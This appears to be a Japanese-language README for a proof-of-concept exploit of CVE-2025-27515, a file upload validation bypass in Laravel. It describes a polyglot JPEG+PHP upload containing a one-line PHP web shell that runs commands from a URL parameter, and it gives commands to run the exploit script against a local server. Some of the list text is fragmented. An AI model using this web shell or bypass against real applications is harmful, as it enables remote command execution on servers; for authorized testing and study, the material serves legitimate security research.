
CVE-2025-27515の概念実証
CVE-2025-27515 の実践的なデモンストレーション。Laravel Framework(≤ 12.0.0)におけるファイルアップロード検証バイパスの脆弱性です。
CVE-2025-27515 は、Laravel アプリケーションがワイルドカード検証パターン(files.*)を使用する際に、攻撃者がファイルアップロード制限を回避できるようにする検証バイパスです。この脆弱性は、Laravel が配列ベースのファイルアップロードを処理する際の弱点を悪用して、悪意のあるファイルのアップロードを可能にします。
重要度: 中/高
CWE: CWE-20(不適切な入力検証)
このエクスプロイトは、次のようなポリグロット JPEG+PHP ファイルを使用します:
FF D8 FF E0)を含む<?php system($_GET['cmd']); ?>)を含む.jpg 拡張子を使用するphp artisan serve
# Access at http://localhost:8000/upload
Python 版:
pip3 install -r requirements.txt
python3 exploit.py http://localhost:8000
教育目的および許可されたセキュリティテストのみに使用
作成者: Guaxinim | サイバーセキュリティ研究